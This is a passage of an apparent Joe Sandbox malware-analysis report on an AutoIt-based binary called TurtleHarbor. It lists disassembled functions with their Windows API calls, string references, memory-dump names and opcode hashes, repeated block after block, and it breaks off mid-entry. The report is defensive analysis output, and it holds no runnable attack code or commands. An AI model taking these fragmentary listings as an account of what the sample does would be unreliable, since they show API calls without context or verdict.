GetDC.USER32(00000000), ref: 00350683
GetDeviceCaps.GDI32(00000000,0000000C), ref: 003506A3
ReleaseDC.USER32(?), ref: 003506C4

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 8554d768b93023705c4cae2c72c5b3ac8adb71b87f1416b7326de35c5f3241a8
Instruction ID: b27c8b645d0a96aa11f13805a991101fad87185db65d31435bee7bd37a5a131b
Opcode Fuzzy Hash: 8554d768b93023705c4cae2c72c5b3ac8adb71b87f1416b7326de35c5f3241a8
Instruction Fuzzy Hash: 12E012B1800204EFCF0B9FA0D808AADBBF9EB9D315F11C409FC5AA7220CB3985919F50

Function 0035068D Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0035068D
GetDC.USER32(00000000), ref: 00350697
GetDeviceCaps.GDI32(00000000,0000000C), ref: 003506A3
ReleaseDC.USER32(?), ref: 003506C4

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 1be1b517d09a9145756cf649ba64bc142a7164da7aa6a83f4bf0f9ea956e9c3c
Instruction ID: d5c921fc88914f7a081a543368785e63125c6141f101be9c8be300bb0578bd9f
Opcode Fuzzy Hash: 1be1b517d09a9145756cf649ba64bc142a7164da7aa6a83f4bf0f9ea956e9c3c
Instruction Fuzzy Hash: 2BE012B1800204AFCF0A9FA0D808A9D7BF9EB9D314F108008F95AA7220CB3895918F50

Function 0036BE8C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0036C057

Strings

AutoIt3GUI, xrefs: 0036BFCF
Container, xrefs: 0036BFD4

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: d974a2b9f097d81df7eabef4bbee99375172128c0e4e1acd3524e0c82cef5f4d
Instruction ID: 2e9a97986deec5e66ac749a256db5399e29deea12c184502f3ca0ec3e7a7035a
Opcode Fuzzy Hash: d974a2b9f097d81df7eabef4bbee99375172128c0e4e1acd3524e0c82cef5f4d
Instruction Fuzzy Hash: E0914574210601EFDB15CF64C884A6ABBE8FF49710F20846EF94ACF6A5DB71E841CB60

Function 0037B5EF Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0032436A: _wcscpy.LIBCMT ref: 0032438D

Part of subcall function 00314D37: __itow.LIBCMT ref: 00314D62
Part of subcall function 00314D37: __swprintf.LIBCMT ref: 00314DAC

__wcsnicmp.LIBCMT ref: 0037B670
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0037B739

Strings

LPT, xrefs: 0037B66A

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 8ddb787ff8d6666892319a2727a4a5721ad809624b6e945eb9fa76300e01e40a
Instruction ID: 3f00a0101b6659baa26380d5aba0e5e765dbf958e549010890becd308ddf7f92
Opcode Fuzzy Hash: 8ddb787ff8d6666892319a2727a4a5721ad809624b6e945eb9fa76300e01e40a
Instruction Fuzzy Hash: B9616075A00219EFCB2ADF54C891FAEF7B8EF48710F118059F54AAB291D774AE80CB50

Function 0031E00D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0031E01E
GlobalMemoryStatusEx.KERNEL32(?), ref: 0031E037

Strings

@, xrefs: 0031E02B

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 13fb18929704cf883f39a5cc257b1c84c0cc7b97d7e1d5edbe5824c0d1a35fdd
Instruction ID: 01df93d7c384f7f3fc355bb0d8514559cc6d6591842bc9cb600266ee5ac501c1
Opcode Fuzzy Hash: 13fb18929704cf883f39a5cc257b1c84c0cc7b97d7e1d5edbe5824c0d1a35fdd
Instruction Fuzzy Hash: 245169B14087449BE321AF14EC85BAFB7FCFB89314F81894CF2D845091DB709468CB16

Function 00398096 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00398186
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0039819B

Strings

', xrefs: 003980EF

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 5d50184c3cd53d979f65fc61c955e260a6036f202507dd301a92660839ee5fee
Instruction ID: 05f92ade8b706e1e771f2181c19e7a300366f0ca67980530db9499773d2ca382
Opcode Fuzzy Hash: 5d50184c3cd53d979f65fc61c955e260a6036f202507dd301a92660839ee5fee
Instruction Fuzzy Hash: 89413975A01209AFDF15CF68C881BDA7BB9FF49300F10006AE904EB351DB30A956CF90

Function 00382C5A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00382C6A
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00382CA0

Strings

|, xrefs: 00382C71

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 3d872c28be7656a446e1036715d6d098b45c869ec4cf973b28c214b3f89ebd5b
Instruction ID: db50f52be38ea5a9e7abc06d5b9959ed6b5d60136d9fcf50aee64df18452af28
Opcode Fuzzy Hash: 3d872c28be7656a446e1036715d6d098b45c869ec4cf973b28c214b3f89ebd5b
Instruction Fuzzy Hash: FD313B75C00219ABCF02EFA0DD85AEFBFB9FF18310F100059F915AA166DB315A56DBA0

Function 00397088 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 0039713C
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00397178

Strings

static, xrefs: 003970D8

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 5b0e0d636bf7c63a676632acaf0ff82bb7c9d718593201d9a83e966ae2a78b94
Instruction ID: 2decde5b6fa549186c05c6150aca201ea35e35c340d31707af5c07459700af26
Opcode Fuzzy Hash: 5b0e0d636bf7c63a676632acaf0ff82bb7c9d718593201d9a83e966ae2a78b94
Instruction Fuzzy Hash: 26319A71110604AAEF169F78DC80AFB77ADFF88720F119619F9A587290DB31AC81CB60

Function 00373049 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003730B8
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003730F3

Strings

0, xrefs: 003730B1

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: bffe187a78c7fec63064ae95eee8b6b1e335051fe046c25c0d5cf15f5a78a49f
Instruction ID: 8547ebda1e435164dbc49a6bfb5d3c5d4f17ed0393129e0a5c5adb2ca5a87fa8
Opcode Fuzzy Hash: bffe187a78c7fec63064ae95eee8b6b1e335051fe046c25c0d5cf15f5a78a49f
Instruction Fuzzy Hash: 1E312B31600305DFEB36EF58C885BEEBBB8EF05340F15C019E889A61A1D7789B44EB51

Function 003840B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00384132

Part of subcall function 00321A36: _memmove.LIBCMT ref: 00321A77

Strings

AUTOITCALLVARIABLE%d, xrefs: 00384124
, $, xrefs: 00384172

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: 88ebfdc36538d64643222b469cf51277d0984a3d0f78fde59b5c97ed1aaf19c6
Instruction ID: 35c9798a098485375679e6b53e1c76441efb82f79955d612c7828064fd382783
Opcode Fuzzy Hash: 88ebfdc36538d64643222b469cf51277d0984a3d0f78fde59b5c97ed1aaf19c6
Instruction Fuzzy Hash: BC21B130A0022DABCF06EF64D996EEE77B8AF54740F404498F905EB141DB30A985CBA1

Function 00396CF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00396D86
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00396D91

Strings

Combobox, xrefs: 00396D53

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 2f7acca1ccb6c2fd11cdebaf1cb30050815acd9c0cf95de2ee2d721067031a50
Instruction ID: f40fbae9a54037dc931f859fb0995230df6ccb5fd696aa83f96fc179eea3b6bd
Opcode Fuzzy Hash: 2f7acca1ccb6c2fd11cdebaf1cb30050815acd9c0cf95de2ee2d721067031a50
Instruction Fuzzy Hash: 1C11B271311208BFEF169E54DC82EFB3B6EEB883A4F114129F9289B290D6319C5087A0

Function 0039722C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00312111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0031214F
Part of subcall function 00312111: GetStockObject.GDI32(00000011), ref: 00312163
Part of subcall function 00312111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0031216D

GetWindowRect.USER32(00000000,?), ref: 00397296
GetSysColor.USER32(00000012), ref: 003972B0

Strings

static, xrefs: 00397273

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: f1a3d5e3d4951c09c787dc3003630d176b4177b5af366ba206d967d7a0c9210d
Instruction ID: 30637c8e06879ba378b67ea0601d49ce3aaabf9c002da229f332bac003ffa4bc
Opcode Fuzzy Hash: f1a3d5e3d4951c09c787dc3003630d176b4177b5af366ba206d967d7a0c9210d
Instruction Fuzzy Hash: 7F21477262420AAFDF0ADFB8CC45AFA7BA8EB09304F014918FD95D3290E735A8509B50

Function 00396F45 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00396FC7
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00396FD6

Strings

edit, xrefs: 00396FAB

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: b27f70122156085a2e08bbd0163f6bc05d840a72b2e3049a2ad4d93c9a96838c
Instruction ID: 2a3f5aa0caec88088a5005cb042e50f968cf1f0cefeed3aea9a72a4842b9b43c
Opcode Fuzzy Hash: b27f70122156085a2e08bbd0163f6bc05d840a72b2e3049a2ad4d93c9a96838c
Instruction Fuzzy Hash: 11118C71502208AFEF129E64EC86EFB3B6EEB05368F114714F966971E0C735DC909B60

Function 00373156 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003731C9
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 003731E8

Strings

0, xrefs: 003731BF

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 0b7d236fb21c1c1ee647c78dea027f3c8a366533cdd02c283a1227f7683eebec
Instruction ID: 92c6024cd7109fb0ee892693bc2d9d6d20b4cb0303aa2990a806c7a7931d1fd9
Opcode Fuzzy Hash: 0b7d236fb21c1c1ee647c78dea027f3c8a366533cdd02c283a1227f7683eebec
Instruction Fuzzy Hash: 88112635902116EBDB33EA98DC45B9D73BCAB05300F458122E809A7291D738AF04EB90

Function 003134E4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 0031351D
DestroyWindow.USER32(?,?,00324E61), ref: 00313576

Strings

h:, xrefs: 003134E5

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: DeleteDestroyObjectWindow
String ID: h:
API String ID: 2587070983-2924159345
Opcode ID: 94bff7db8cff0da20c66ad3ed07cf5ae38175b3bec8ab46fda5f9bbbf72f6b7b
Instruction ID: 3a32a5b9705ca45fc64298d19ab37784aff856bfa4c1798ddbf71af814e5797a
Opcode Fuzzy Hash: 94bff7db8cff0da20c66ad3ed07cf5ae38175b3bec8ab46fda5f9bbbf72f6b7b
Instruction Fuzzy Hash: F021817460A210CFCB1FDF19F859AA533EAAB49710F01455BE806CB6A0EB30DE80DF40

Function 003828A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 003828F8
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00382921

Strings

<local>, xrefs: 003828E9

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 7abf9ddfe16dbc62928aa65968611e33b3cfbc7f5dc75ff7521fc42de72869f4
Instruction ID: 59277d6e6843a39ac859705f09778c2fbfbf08a10dcf47a167089cad29d6c571
Opcode Fuzzy Hash: 7abf9ddfe16dbc62928aa65968611e33b3cfbc7f5dc75ff7521fc42de72869f4
Instruction Fuzzy Hash: 5411A070501325BAEF2A9F518C89EFBFBACFF06751F1081AAF55596500E3706894DBE0

Function 0037D116 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 0037D180

Strings

0.0.0.0, xrefs: 0037D18E
L,:, xrefs: 0037D12E

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: _wcscmp
String ID: 0.0.0.0$L,:
API String ID: 856254489-1304297062
Opcode ID: 5a2cf3a6decb3bf7d1d07890f6072cb08ed55c2551a9975d585a828e78156e4d
Instruction ID: 38db3864b8ca348184816cd205fceef2ad09e7a48e51c4e7c4f071f05d4ea39c
Opcode Fuzzy Hash: 5a2cf3a6decb3bf7d1d07890f6072cb08ed55c2551a9975d585a828e78156e4d
Instruction Fuzzy Hash: 75119435600204DFCB19EF14D981E9AB7B9AF89720F51C059F90E5F3A1DA34ED86CB50

Function 00388475 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 003886E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0038849D,?,00000000,?,?), ref: 003886F7

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 003884A0
htons.WSOCK32(00000000,?,00000000), ref: 003884DD

Strings

255.255.255.255, xrefs: 003884B8

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: 3dec6df7544b3eb6969b46459401bc344e9b65f49bee3815f38aa7df31578dd2
Instruction ID: efa280c4555b6990cfd8879181ed1bdd6fada8bb3521f9a17e0273ad96e8c174
Opcode Fuzzy Hash: 3dec6df7544b3eb6969b46459401bc344e9b65f49bee3815f38aa7df31578dd2
Instruction Fuzzy Hash: 8E11A535100316ABDB11BF64DC46FBEB329FF05320F50855AF9159B291DB72A814C795

Function 003699BD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00321A36: _memmove.LIBCMT ref: 00321A77

Part of subcall function 0036B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0036B7BD

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00369A2B

Strings

ListBox, xrefs: 003699F5
ComboBox, xrefs: 003699CA

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
